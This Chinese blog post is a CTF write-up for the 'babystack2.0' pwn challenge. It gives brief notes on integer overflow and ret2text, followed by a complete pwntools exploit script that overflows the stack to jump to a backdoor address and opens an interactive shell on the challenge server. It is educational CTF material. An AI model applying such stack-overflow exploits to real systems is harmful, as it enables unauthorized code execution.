babystack2.0-入土为安的第十六天

已于 2024-08-13 14:51:13 修改
阅读量231 收藏
点赞数 1
文章标签: 网络安全
于 2024-08-05 13:16:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzx13290757580/article/details/140924076
版权

checksec pwn 

整数溢出

ret2text

栈溢出

这行代码等待服务器发送包含 'your name:' 的提示,然后发送字符串 '-1'。这通常用于触发程序接收用户名的部分。

这行代码在收到包含 "name?" 的提示后,发送前面构造的载荷 payload。这通常用来触发某种缓冲区溢出或其他漏洞,进而将控制权转移到你指定的地址(0x400726

from pwn import*
p=remote("node4.anna.nssctf.cn",28324)
p.sendlineafter('your name:',b'-1')
payload=b'b'*(0x10+8)+p64(0x400726)
p.sendlineafter("name?",payload)
p.interactive()

丸卜
关注
tea-入土为安的第十七
lzx13290757580的博客
08-12 189
注意一点v4 -= 1640531527实际上就等于+0x9E3779B9。
入门逆向-入土为安的第二十五
lzx13290757580的博客
08-26 953
机器语言是计算机能够直接理解和执行的最低级语言,由二进制指令组成,通常由0和1表示。
[MoeCTF 2022]babyfmt-入土为安的第十九
lzx13290757580的博客
08-14 324
入门格式化字符串 GOT劫持借鉴。
[NISACTF 2022]ezpie- 入土为安的第十五
lzx13290757580的博客
08-04 291
​ PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题。这个题目的大致思路就是,通过接收输出的main函数的地址,再通过偏移量计算到后门函数的地址,之后,进行栈溢出攻击即可。运行可以看到确实有70。所以后三位才会保持不变。
parallel-comparator-200-入土为安的第九
lzx13290757580的博客
07-29 177
通过随机数生成一个字母。
DosSnake-入土为安第八
lzx13290757580的博客
07-27 256
记录一下不能F5反编译。
[LitCTF 2023]debase64-入土为安的第十八
lzx13290757580的博客
08-13 204
点进去sub_401520(v15, (int)v4)
[GDOUCTF 2023]Tea-入土为安的第二十二
lzx13290757580的博客
08-20 241
(_DWORD *)(a1 + 4i64 * i)=a1[i],我觉得是把4i64舍去,并转成数组,所以*(_DWORD *)(a1 + 4i64 * v3)=a1[v3]在左边找不到main函数,怎么办,shirt12查找字符串Ctrl+f找flag。一直点进去 sub_1400112B7,得到tea的加密。一直点进去sub_140011339,得到key。sub_140011352 为密文。*(_DWORD *)怎么处理。怎么能转化为看的懂的加密的。
[MTCTF 2021]Random-入土为安的第二十二
lzx13290757580的博客
08-20 384
动调在 v4 = rand()和 byte_2D3370[v5] ^= rand()F2下断点F9调试。按yes,一直单步调试 F8,到xor是看右边第一行,记录下来。返回主函数,点byte_2D2138[v8]找key值。动调,随机数,xor。
初中语文文摘社会入土为安
09-09
1. 文章标题和描述中的"入土为安"是中国传统文化中的一种观念,意味着逝者下葬后,其灵魂得以安宁,家人也可以得到心灵的慰藉。这一概念通常与丧葬习俗有关,表达了人们对死亡和安息的尊重。 2. "入土为安"在文章中...
殡葬行业报告福成股份-崛起中的殡葬龙头
03-25
殡葬行业近千亿市场规模,其中占比过半、民营参与度最高的当属经营性公墓。受到土地属性和民政局经营许可牌照两方面制约,经营性公墓...我国隆丧厚葬传统悠久,孝文化和“入土为安”思想使买方很少议价,行业利润丰厚。
结婚红包贺词精选.doc
10-11
8. "恩恩爱爱锋芒毕露,嘻嘻哈哈凡百一新" - 这是对新人恩爱生活的生动描绘,希望他们在欢笑中度过每一,共同创造新的生活篇章。 9. "哥们,你居然娶了大明湖畔的夏雨荷呀!恭喜!"这句贺词巧妙地引用了《还珠...
最详细的Spring-data-jpa入门(一)
热门推荐
此成非彼诚博客
08-13 10万+
刚进公司,人生地不熟,偷偷藏着本《mybatis入土为安》,以为可以靠mybatis混的轻松点,谁知有不测风云,大家用的是JPA。我这个小白没有听说过,全英文名叫,就是java持久化api,是SUN公司推出的一套基于的规范。持久化想必如雷贯耳,都0202年了,谁还不用个持久化框架啊,举起mybatis。ORM呢?全英文名为:对象关系映射,简单来说为了不用JDBC那一套原始方法来操作数据库,ORM框架横空出世(mybatis、hibernate等等)。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8498
随着近几国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
大学生职业生涯规划书Word模板范文就业求职简历应聘工作PPT医疗康复专业
最新发布
10-12
大学生职业生涯规划书Word模板范文就业求职简历应聘工作PPT医疗康复专业
基于Java的学生信息管理系统的实现与操作
10-12
本文介绍了一个Java实现的小型系统 -- 学生信息管理系统,包括学生数据的增删查改四个主要操作的功能演示,并具体讲解了涉及三个核心类(Student.java、StudentManager.java、StudentFrame.java)的设计思想以及代码逻辑。适合Java初学者用来了解面向对象的概念应用以及Swing工具包进行GUI创建的基础方法和步骤。系统通过提供文本框用于输入学生ID和其他必要信息,并提供按钮来执行对应指令,显示栏展示查询结果显示,使操作变得更为简洁直观有效。 适用于初步掌握Java基础的开发者,特别是想要加强自己对面向对象编码思维理解和运用的同学。 使用此管理系统可以在本地电脑环境上进行学生的数据维护工作(如增删改查),提高学校教务工作者处理信息的效率。 除了基本的数据录入和搜索之外,该项目也帮助理解如何设计合理的模型类并使用集合存储大量数据元素,另外还介绍了如何通过事件监听的方式绑定用户行为和应用程序之间的交互流程。
基于单片机控制的填块切割装置的设计_孟紫腾.pdf
10-12
基于单片机控制的填块切割装置的设计_孟紫腾
ImageNet-1K数据集索引和对应的中英文表单
10-12
ImageNet-1K数据集索引和对应的中英文表单
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值